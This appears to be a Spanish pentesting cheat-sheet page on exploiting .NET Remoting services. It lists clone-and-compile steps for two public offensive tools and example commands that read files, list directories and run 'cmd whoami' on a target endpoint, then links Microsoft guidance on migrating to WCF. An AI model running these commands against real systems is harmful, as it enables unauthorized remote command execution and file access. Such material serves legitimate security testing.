.NET Remoting

Explotación

NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricksarrow-up-right

git clone https://github.com/codewhitesec/NewRemotingTricks.git

Se compila, por ejemplo, con Visual Studio 2022.

.\RemotingClient_MBRO.exe tcp://192.168.1.100:8090/LoggingSink C:\Windows.ini
.\RemotingClient_MBVO.exe tcp://192.168.1.100:8090/LoggingSink C:\Windows.ini

https://code-white.com/blog/teaching-the-old-net-remoting-new-exploitation-tricks/arrow-up-right

ExploitRemotingService

https://github.com/tyranid/ExploitRemotingServicearrow-up-right

git clone https://github.com/tyranid/ExploitRemotingService.git

Se compila, por ejemplo, con Visual Studio 2022.

.\ExploitRemotingService.exe tcp://$IP:$PORT ver
.\ExploitRemotingService.exe tcp://$IP:$PORT ls C:\
.\ExploitRemotingService.exe tcp://$IP:$PORT cmd whoami

Recomendaciones

circle-check

https://learn.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcfarrow-up-right

Referencias

Última actualización